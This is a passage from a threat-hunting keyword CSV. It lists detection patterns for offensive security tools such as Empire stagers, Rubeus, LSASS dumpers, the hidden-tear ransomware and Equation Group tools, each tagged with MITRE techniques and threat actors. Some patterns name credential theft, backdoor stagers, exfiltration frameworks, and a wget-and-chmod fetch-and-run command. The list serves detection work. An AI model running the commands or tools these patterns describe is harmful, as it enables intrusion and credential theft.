Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62051" "*Users\Public\callback.el*",".{0,1000}Users\\Public\\callback\.el.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62052" "*users\public\example.bin*",".{0,1000}users\\public\\example\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","62053" "*Users\Public\panda.sense*",".{0,1000}Users\\Public\\panda\.sense.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62054" "*users\public\temp.bin*",".{0,1000}users\\public\\temp\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","62055" "*users_asreproast.txt*",".{0,1000}users_asreproast\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - 
T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62056" "*users_dcsrp_full.txt*",".{0,1000}users_dcsrp_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62057" "*users_kerberoasting.txt*",".{0,1000}users_kerberoasting\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62058" "*users_list_cme_ldap_nullsess_*",".{0,1000}users_list_cme_ldap_nullsess_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62059" "*users_list_kerbrute_*",".{0,1000}users_list_kerbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62060" "*users_list_ridbrute_*",".{0,1000}users_list_ridbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62061" "*users_no_req_pass.txt*",".{0,1000}users_no_req_pass\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62062" "*users_no_req_pass_full.txt*",".{0,1000}users_no_req_pass_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62063" "*users_only_cracked_through_lm.html*",".{0,1000}users_only_cracked_through_lm\.html.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","62064" "*Uses eBPF to dump secrets use by PAM (Authentication) 
module*",".{0,1000}Uses\seBPF\sto\sdump\ssecrets\suse\sby\sPAM\s\(Authentication\)\smodule.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","62066" "*usestager *backdoor*",".{0,1000}usestager\s.{0,1000}backdoor.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62067" "*usestager 
*ducky*",".{0,1000}usestager\s.{0,1000}ducky.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62068" "*usestager *launcher_bat*",".{0,1000}usestager\s.{0,1000}launcher_bat.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - 
T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62069" "*usestager *launcher_lnk*",".{0,1000}usestager\s.{0,1000}launcher_lnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - 
T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62070" "*usestager *shellcode*",".{0,1000}usestager\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62071" "*usestager multi/launcher*",".{0,1000}usestager\smulti\/launcher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62072" "*Using a domain DPAPI backup key to triage masterkeys for decryption key mappings*",".{0,1000}Using\sa\sdomain\sDPAPI\sbackup\skey\sto\striage\smasterkeys\sfor\sdecryption\skey\smappings.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","62073" "*using ClickJack.Extensions*",".{0,1000}using\sClickJack\.Extensions.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","62074" "*using ClickJack.Modules*",".{0,1000}using\sClickJack\.Modules.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","62075" "*using default value 1208 and flag 1 for w11 and w10*",".{0,1000}using\sdefault\svalue\s1208\sand\sflag\s1\sfor\sw11\sand\sw10.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","62076" "*using donutCS*",".{0,1000}using\sdonutCS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","62077" "*using 
hidden_tear.Tools*",".{0,1000}using\shidden_tear\.Tools.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variants in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","62078" "*using KrbRelayUp.*",".{0,1000}using\sKrbRelayUp\..{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","62079" "*using MDE_Enum;*",".{0,1000}using\sMDE_Enum\;.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","62080" "*using module ""Modifiers\FilePathTransformer.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\FilePathTransformer\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62081" "*using module ""Modifiers\OptionCharSubstitution.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\OptionCharSubstitution\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native
executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62082" "*using module ""Modifiers\QuoteInsertion.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\QuoteInsertion\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62083" "*using module ""Modifiers\RandomCase.psm1""*",".{0,1000}using\smodule\s\""Modifiers\\RandomCase\.psm1\"".{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#content","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62084" "*using Moriarty.Msrc;*",".{0,1000}using\sMoriarty\.Msrc\;.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","62085" "*using NixImports*",".{0,1000}using\sNixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","62086" 
"*using Rubeus.Domain;*",".{0,1000}using\sRubeus\.Domain\;.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","62087" "*using SharpDecryptPwd*",".{0,1000}using\sSharpDecryptPwd.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","62088" "*using SharpExfiltrate*",".{0,1000}using\sSharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","62089" "*using SharpSploit.Credentials*",".{0,1000}using\sSharpSploit\.Credentials.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","62090" "*using SharpUp.Classes*",".{0,1000}using\sSharpUp\.Classes.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","62091" "*using SharpView.Enums*",".{0,1000}using\sSharpView\.Enums.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","62092" "*using SMBeagle*",".{0,1000}using\sSMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","62093" "*using static BackupCreds.Interop*",".{0,1000}using\sstatic\sBackupCreds\.Interop.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","62094" "*using static SharpUp.Utilities*",".{0,1000}using\sstatic\sSharpUp\.Utilities.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","62095" "*Using technique (hiding scheduled task) requires NT AUTHORITY*",".{0,1000}Using\stechnique\s\(hiding\sscheduled\stask\)\srequires\sNT\sAUTHORITY.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","62096" "*Using VirusToal website as external C2*",".{0,1000}Using\sVirusToal\swebsite\sas\sexternal\sC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing 
auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","62097" "*UsoDllLoader*",".{0,1000}UsoDllLoader.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","N/A","4","386","100","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z","62098" "*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*",".{0,1000}usr\/bin\/wget\s\-O\s\/tmp\/a\shttp.{0,1000}\schmod\s755\s\/tmp\/cron.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. 
